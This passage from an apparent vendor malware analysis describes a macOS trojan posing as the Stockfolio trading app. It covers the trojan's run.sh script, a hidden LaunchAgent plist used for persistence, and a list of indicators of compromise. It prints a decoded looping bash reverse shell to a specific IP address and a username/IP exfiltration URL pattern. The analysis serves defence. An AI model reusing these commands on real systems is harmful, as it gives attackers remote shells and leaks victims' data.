Once opened, Trojan.MacOS.GMERA.B will execute the embedded copy of Stockfolio version 1.4.13, after which it will launch the shell script run.sh
The script run.sh collects usernames and ip addresses from the infected machine via the following command:
- username = ‘whoami’
- ip address = ‘curl -s ipecho.net/plain’
It connects to the malware URL hxxp://owpqkszz[.]info to send the username and IP address information using the following format:
- hxxp://owpqkszz[.]info/link.php?{username}&{ip address}
As part of its routine, the malware also drops the following files:
File | Details |
/private/tmp/.com.apple.upd.plist | Copy of ~/Library/LaunchAgents/.com.apple.upd.plist |
~/Library/LaunchAgents/.com.apple.upd.plist | Persistence mechanism |
/tmp/loglog | Malware execution logs |
Figure 9. Content of the run.sh shell script
One of the primary changes found in the second variant, aside from the simplified routine, is the presence of a persistence mechanism via the creation of a property list (plist) file: ~/Library/LaunchAgents/.com.apple.upd.plist
Figure 10. Hidden plist file used for persistence
After we decoded the b64-encoded arguments for the plist file, we found the following code:
- while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c ‘bash -i >/dev/tcp/193.37.212.176/25733 0>&1’; done
This code instructs the plist file to constantly create the reverse shell mentioned earlier, occuring every 10,000 seconds.
The simple reverse shell created was observed to use the ports 25733-25736.
Conclusion
Given the changes we’ve seen from the malware variant’s initial iteration to its current one, we notice a trend in which the malware authors have simplified its routine and added further capabilities. It’s possible that the people behind it are looking for ways to make it more efficient – perhaps even adding evasion mechanisms in the future.
In the meantime, we advise aspiring traders to practice caution when it comes to the programs they download, especially if it comes from an unknown or suspicious website. We recommend that users only download apps from official sources to minimize chances of downloading a malicious one.
We reached out to Apple before publication of this entry, and they informed us that the code signing certificate of this fake app’s developers was revoked in July of this year.
Trend Micro solutions
End users can benefit from security solutions such as Trend Micro Home Security for Mac, which provides comprehensive security and multi-device protection against cyberthreats. Enterprises can benefit from Trend Micro’s Smart Protection Suites with XGen™ security, which infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint.
Indicators of Compromise (IoCs)
Sample 1
Filename | SHA256 | Detection name |
plugin | 6fe741ef057d38dd6d9bbe02dacbcb4940dac6c32e0f50a641e73727d6bf60d9 | Trojan.SH.GMERA.A |
stock | 6f48ef0d76ce68bbca53b05d2d22031aec5ce997e7227c3dcb20809959680f11 | Trojan.SH.GMERA.A |
Stockfoli | efd5b96f489f934f2465a185e43fddf50fcde51b12a8fb91d5d93b09a21706c7 | Trojan.MacOS.GMERA.A |
Trial_Stockfoli.zip | 18e1db7c37a63d987a5448b4dd25103c8053799b0deea5f45f00ca094afe2fe7 | Trojan.MacOS.GMERA.A |
Sample 2
Filename | SHA256 | Detection name |
com.apple.upd.plist | be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787 | Trojan.MacOS.GMERA.B |
run.sh | d50f5e94f2c417623c5f573963cc777c0676cc7245d65967ca09a53f464d2b50 | Trojan.SH.GMERA.B |
Stockfoli | 83df2f39140679a9cfb55f9c839ff8e7638ba29dba164900f9c77bb177796e03 (sample 2) | Trojan.MacOS.GMERA.B |
Trial_Stockfoli.zip | faa2799751582b8829c61cbfe2cbaf3e792960835884b61046778d17937520f4 (sample 2) | Trojan.MacOS.GMERA.B |
Related posts:
Trend Micro Internet Security App Mac Free
Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware: